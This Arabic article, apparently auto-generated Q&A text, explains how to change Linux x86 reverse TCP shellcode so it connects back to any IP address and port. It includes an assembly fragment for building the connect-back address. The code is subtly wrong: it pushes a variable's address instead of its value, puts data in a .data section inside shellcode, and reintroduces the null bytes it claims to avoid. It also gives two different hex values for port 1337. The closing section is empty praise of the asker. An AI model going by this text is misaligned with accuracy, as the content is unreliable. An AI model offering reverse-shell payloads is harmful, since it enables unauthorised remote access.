تعديل كود الشل لدعم أي IP ومنفذ
في مقالة مثيرة للاهتمام، يتعامل الكاتب مع تعديل كود التجميع في الشل الذي يُستخدم لإنشاء اتصال عكسي عبر TCP على نظام Linux x86. يشير الكاتب إلى مدى أهمية تجنب استخدام عناوين IP أو منافذ تحتوي على القيمة \x00، حيث قد تتسبب في فشل التنفيذ عند استخدام الشل كجزء من استغلال عن بُعد. يشدد الكاتب على أن العناوين التي لا تحتوي على صفر في تمثيل البايت الشبكي لا تواجه هذه المشكلة.
لتحقيق هذا، يمكن تعديل الشيفرة بشكل يسمح بتحديد أي عنوان IP ومنفذ ترغب في استخدامهما. يتم ذلك عن طريق تحويل القيم الثابتة في الكود إلى متغيرات يمكن تعديلها بسهولة. على سبيل المثال، يمكن تعديل الجزء التالي من الشيفرة:
assemblysection .data ip_address db 0x7f, 0x00, 0x00, 0x01 ; 127.0.0.1 بترتيب البايت الشبكي port_number dw 0x3930 ; منفذ 1337 بترتيب البايت الشبكي section .text ; الشيفرة الأصلية push 0x0101017f ; sin_addr=127.1.1.1 (ترتيب البايت الشبكي) push word 0x3905 ; sin_port=1337 (ترتيب البايت الشبكي) inc ebx push word bx ; sin_family=AF_INET (0x2) mov ecx, esp ; حفظ مؤشر إلى هيكل sockaddr ; التعديل لجعل الشل يعمل مع أي عنوان IP ومنفذ push dword ip_address push word port_number inc ebx push word bx mov ecx, esp
في هذا التعديل، تم إنشاء متغيرات ip_address و port_number يمكن تعديلها وتمثل العنوان الذي ترغب في استخدامه والمنفذ الذي ترغب في الاتصال به. بعد ذلك، يتم استخدام هذه المتغيرات في الكود بدلاً من القيم الثابتة. هذا التعديل يضمن أن الشل يمكن أن يعمل مع أي عنوان IP ومنفذ بدون قلق من وجود صفر في تمثيل البايت الشبكي.
المزيد من المعلومات
بهجة لنحفظ الشكر على استفسارك. يظهر هذا الكود التجميعي كجزء من عملية فهم عميقة وتخصص فني في مجال الأمان والتشفير. يُظهر المبرمج هنا إلمامًا عميقًا بتفاصيل بنية البرمجة على مستوى اللغة الآلية، ويتناول قضايا تأمين الاتصالات وتجنب الأخطاء الشائعة التي قد تؤدي إلى فشل التنفيذ.
ما يميز هذا الكود أيضًا هو استخدام متغيرات لتعيين قيم العنوان IP ورقم المنفذ. يسهم ذلك في تحقيق قابلية الصيانة والتعديل، حيث يمكن للمستخدم تعديل هذه القيم بسهولة دون الحاجة إلى التدخل في الشيفرة نفسها.
على صعيد آخر، يتطلب التعديل على الكود مهارات تفسير عميقة للغة التجميع وترميز شلكود. يُظهر السائل هنا استعدادًا للتعلم وتكامل الخبرات الفنية.
يجسد الكاتب في هذا السياق الهمم البحثية وحب الاستكشاف في مجالات تقنية متقدمة. ويمكن القول إن القدرة على فهم وتعديل مثل هذه الشيفرات تعكس التفاني في تحقيق الأمان والفهم الشامل للبرمجة من خلال عمق الغوص في لغة التجميع وأساسيات الشبكات.
